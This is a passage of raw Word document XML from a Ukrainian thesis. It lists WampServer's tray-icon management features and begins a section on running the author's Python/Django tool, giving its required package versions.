        <w:t xml:space="preserve"> володіє також "Іконою в треї" ( "TrayIcon"), яка дозволяє легко управляти і конфігурувати сервера, не вдаючись до файлів конфігурації.</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Клацання лівою клавішею мишки на ікону WampServer дозволить:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E500175" w14:textId="1B7F315D" w:rsidR="00E10BF3" w:rsidRDefault="00E10BF3" w:rsidP="00E10BF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Керувати налаштуваннями Apache і MySQL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79958443" w14:textId="7F50C7CB" w:rsidR="00E10BF3" w:rsidRDefault="00E10BF3" w:rsidP="00E10BF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Міняти статус в мережі / не в мережі (доступно кожному </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">користувачу </w:t>
      </w:r>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>або ж лімітовано на локальному хості)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DACC2" w14:textId="54BBD893" w:rsidR="00E10BF3" w:rsidRDefault="00E10BF3" w:rsidP="00E10BF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Встановлювати</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> або змінювати версію Apache, MySQL та PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570757D" w14:textId="590DC36B" w:rsidR="00E10BF3" w:rsidRDefault="00E10BF3" w:rsidP="00E10BF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Керувати параметрами конфігурацій серверів</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000EC25E" w14:textId="2707458C" w:rsidR="00E10BF3" w:rsidRDefault="00E10BF3" w:rsidP="00E10BF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Отримувати доступ до логів</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DAA0F" w14:textId="5B0B24CF" w:rsidR="00FD3159" w:rsidRDefault="00E10BF3" w:rsidP="007A5059">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Отримувати доступ до файлів конфігурацій</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> [39]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558FF669" w14:textId="77777777" w:rsidR="00ED2EBE" w:rsidRPr="00ED2EBE" w:rsidRDefault="00ED2EBE" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F688A4" w14:textId="4B76C567" w:rsidR="00ED2EBE" w:rsidRDefault="00ED2EBE" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB7B1DA" wp14:editId="2E209F39">
            <wp:extent cx="6120130" cy="4341495"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="25" name="Рисунок 25" descr="Image result for wamp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wamp serv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4341495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="267FE978" w14:textId="7FAF6C85" w:rsidR="00ED2EBE" w:rsidRPr="00ED2EBE" w:rsidRDefault="00ED2EBE" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис. 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EBE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WampServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE66EE" w14:textId="77777777" w:rsidR="007679D8" w:rsidRPr="005B4CE1" w:rsidRDefault="007679D8" w:rsidP="005B4CE1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA7CC2D" w14:textId="06320103" w:rsidR="00484499" w:rsidRDefault="00484499" w:rsidP="00484499">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc516752161"/>
      <w:bookmarkStart w:id="125" w:name="_Toc30433158"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:r w:rsidR="00913708">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>икористання розробленого інструменту</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="228E4346" w14:textId="46B7A79A" w:rsidR="00484499" w:rsidRDefault="00484499" w:rsidP="00484499">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA58A40" w14:textId="37236F62" w:rsidR="00484499" w:rsidRDefault="00913708" w:rsidP="00402E58">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Для запуску програми потрібно мати інтерпретатор </w:t>
      </w:r>
      <w:r w:rsidR="00402E58" w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="00402E58" w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.5.3 і встановлений наступний список пакетів</w:t>
      </w:r>
      <w:r w:rsidR="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574C390" w14:textId="2E2E6F60" w:rsidR="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>certifi==2019.11.28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46738599" w14:textId="4BBE57FF" w:rsidR="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chardet==3.0.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042AE2C" w14:textId="298F4D28" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>defusedxml==0.6.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FC83A" w14:textId="40C2BDA4" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>diff-match-patch==20181111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F20377" w14:textId="282220E7" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Django==2.0.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405511D7" w14:textId="3C075867" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>django-import-export==2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D73F03" w14:textId="18783C47" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>et-xmlfile==1.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD2704" w14:textId="506B5934" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>idna==2.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A11B5" w14:textId="5A2B1D2F" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jdcal==1.4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B8CEF" w14:textId="0814C1FC" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MarkupPy==1.14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6283EA" w14:textId="248535AD" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>odfpy==1.4.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2568FBB3" w14:textId="4AF3904C" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>openpyxl==2.6.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
